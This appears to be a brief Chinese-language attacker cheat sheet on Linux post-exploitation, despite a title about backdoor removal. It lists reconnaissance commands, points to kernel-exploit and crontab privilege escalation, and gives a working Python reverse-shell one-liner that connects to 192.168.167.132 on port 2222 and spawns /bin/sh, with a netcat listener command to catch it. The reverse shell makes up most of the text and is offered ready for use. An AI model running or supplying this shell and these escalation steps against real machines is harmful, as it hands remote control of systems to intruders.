http://www.nisphome.cn/article-detail?id=164

打扫战场——后门清除与总结

  • whoami查看用户名
  • cat /proc/version 查看linux版本
  • linux内核漏洞提权
    https://github.com/SecWiki/linux-kernel-exploits
  • crontab提权 https://www.freebuf.com/articles/system/175453.html
    /etc/crontab 定时任务
  • 简单的反向shell脚本
    1
    2
    3
    #!/bin/bash
    # linux上简单的反弹shell
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.167.132",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    用netcat -lvp 2222监听